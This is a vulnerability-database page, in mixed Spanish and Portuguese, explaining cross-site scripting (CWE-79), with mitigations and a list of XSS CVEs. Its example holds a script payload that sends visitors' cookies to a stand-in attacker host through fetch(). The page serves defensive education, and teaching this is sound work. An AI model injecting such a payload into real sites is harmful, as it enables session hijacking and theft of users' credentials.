Fallos del tipo CWE-79

28.635 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2023-33132MEDIUMMicrosoft SharePoint Server Spoofing VulnerabilityEPSS 0.9%CVE-2020-1607HIGHJunos OS: Cross-Site Scripting (XSS) in J-WebEPSS 0.9%CVE-2020-7354MEDIUMRapid7 Metasploit Pro Stored XSS in 'host' fieldEPSS 0.9%CVE-2020-7355MEDIUMRapid7 Metasploit Pro Stored XSS in 'notes' fieldEPSS 0.9%CVE-2024-24574MEDIUMphpMyFAQ vulnerable to stored XSS on attachments filenameEPSS 0.9%CVE-2021-25041—Photo Gallery by 10Web < 1.5.68 - Reflected Cross-Site Scripting (XSS)EPSS 0.9%CVE-2026-33168LOWRails has a possible XSS vulnerability in its Action View tag helpersEPSS 0.9%CVE-2024-50859MEDIUMThe ip_import_acl_csv request in GestioIP v3.5.7 is vulnerable to Reflected XSS. When a user uploads an improperly formatted file, the conteEPSS 0.9%CVE-2026-22029HIGHReact Router vulnerable to XSS via Open RedirectsEPSS 0.9%CVE-2023-26773MEDIUMCross Site Scripting vulnerability found in Sales Tracker Management System v.1.0 allows a remote attacker to gain privileges via the producEPSS 0.9%CVE-2023-4771MEDIUMCross-Site Scripting vulnerability in CKSource CKEditorEPSS 0.9%CVE-2018-16861HIGHA cross-site scripting (XSS) flaw was found in the foreman component of satellite. An attacker with privilege to create entries using the HoEPSS 0.9%CVE-2024-27132HIGHInsufficient sanitization in MLflow leads to XSS when running an untrusted recipe.EPSS 0.9%CVE-2018-6588—CA API Developer Portal 3.5 up to and including 3.5 CR5 has a reflected cross-site scripting vulnerability related to the apiExplorer.EPSS 0.9%CVE-2018-6586—CA API Developer Portal 3.5 up to and including 3.5 CR6 has a stored cross-site scripting vulnerability related to profile picture processinEPSS 0.9%CVE-2021-4139MEDIUMCross-site Scripting (XSS) - Stored in pimcore/pimcoreEPSS 0.9%CVE-2024-0286MEDIUMPHPGurukul Hospital Management System Contact Form index.php#contact_us cross site scriptingEPSS 0.9%CVE-2018-6587—CA API Developer Portal 3.5 up to and including 3.5 CR6 has a reflected cross-site scripting vulnerability related to the widgetID variable.EPSS 0.9%CVE-2021-25043—WOOCS < 1.3.7.3 - Reflected Cross-Site ScriptingEPSS 0.9%CVE-2022-0601—Countdown & Clock < 2.2.9 - Reflected Cross-Site ScriptingEPSS 0.9%